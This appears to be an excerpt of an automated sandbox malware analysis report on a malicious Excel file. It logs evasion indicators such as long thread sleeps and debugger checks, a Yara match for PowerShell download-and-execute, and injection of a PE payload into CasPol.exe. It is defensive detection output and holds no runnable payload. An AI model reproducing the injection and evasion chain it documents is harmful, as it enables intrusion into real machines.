                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                  Source: 0200011080.xlsStream path 'MBD001F7C6B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
                  Source: 0200011080.xlsStream path 'Workbook' entropy: 7.99839989777 (max. 8.0)
                  Source: CC430000.0.drStream path 'MBD001F7C6B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
                  Source: CC430000.0.drStream path 'Workbook' entropy: 7.99845069196 (max. 8.0)

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040E54F Sleep,ExitProcess,32_2_0040E54F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,32_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8892Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1040Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5121Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1693Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2625
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2546
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1581
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5018
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.2 %
                  Source: C:\Windows\System32\mshta.exe TID: 3608Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep count: 8892 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 1040 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 3096Thread sleep time: -540000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 2625 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 2546 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2728Thread sleep count: 1581 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep count: 5018 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3112Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -2400000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1924Thread sleep time: -48000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3440Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3648Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,32_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,32_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044D5E9 FindFirstFileExA,32_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,32_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406AC2 FindFirstFileW,FindNextFileW,32_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,32_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,32_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,32_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,32_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00418981 memset,GetSystemInfo,29_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_30-34269
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,29_2_004044A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00442554 mov eax, dword ptr fs:[00000030h]32_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044E92E GetProcessHeap,32_2_0044E92E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433CD7 SetUnhandledExceptionFilter,32_2_00433CD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00433B44

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
